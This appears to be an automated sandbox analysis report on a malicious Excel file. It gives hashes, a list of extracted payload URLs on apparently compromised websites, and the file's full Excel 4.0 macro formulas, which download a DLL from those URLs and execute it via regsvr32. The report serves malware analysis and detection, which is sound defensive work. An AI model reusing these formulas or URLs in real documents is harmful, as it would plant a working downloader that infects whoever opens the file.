General
-
Target
be91cd909abe9af02e09f4d3918f982d3c8a6426479b8661c38fd3ba4ed37c66
-
Size
29KB
-
MD5
518d59320ac5c5bb379bbe0b32376e1f
-
SHA1
ca23f8bf8823217d522f6c3c56d66c43b5c2ab80
-
SHA256
be91cd909abe9af02e09f4d3918f982d3c8a6426479b8661c38fd3ba4ed37c66
-
SHA512
6a31e152bd82486b063c38373d9c82f4e33ff2ee743874058c59c8c39c0126a70d8639bb998ac89378e5dd657186c90c1c1ba00a4c72e1787a60b3f5c66db6aa
-
SSDEEP
384:RvANFOv+7UaivQ2BNZJibbwBUA6+h4wyqJeAqcctU1jrYsu8HP7jFFtCvI:ZqUtVNZAXby9y+cccS1AsuIjxl
Malware Config
Extracted
https://iqraacfindia.org/wp-admin/dG/
https://he.adar-and-ido.com/wp-admin/xk7D/
https://www.digigoal.fr/wp-admin/VfU0aIj/
https://carzino.atwebpages.com/assets/QwlhxhsYfkYntLW0haX/
https://al-brik.com/vb/mMQlbHPCX/
https://apexcreative.co.kr/adm/VdiKTcljSBORQRrsh66X/
https://biantarajaya.com/awstats-icon/VR5wDEvBj/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://iqraacfindia.org/wp-admin/dG/","..\whxc.dll",0,0) =IF('IJEGVS'!H16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://he.adar-and-ido.com/wp-admin/xk7D/","..\whxc.dll",0,0)) =IF('IJEGVS'!H18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.digigoal.fr/wp-admin/VfU0aIj/","..\whxc.dll",0,0)) =IF('IJEGVS'!H20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://carzino.atwebpages.com/assets/QwlhxhsYfkYntLW0haX/","..\whxc.dll",0,0)) =IF('IJEGVS'!H22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://al-brik.com/vb/mMQlbHPCX/","..\whxc.dll",0,0)) =IF('IJEGVS'!H24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://apexcreative.co.kr/adm/VdiKTcljSBORQRrsh66X/","..\whxc.dll",0,0)) =IF('IJEGVS'!H26<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://biantarajaya.com/awstats-icon/VR5wDEvBj/","..\whxc.dll",0,0)) =IF('IJEGVS'!H28<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\whxc.dll") =RETURN()
Signatures
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
Files
-
be91cd909abe9af02e09f4d3918f982d3c8a6426479b8661c38fd3ba4ed37c66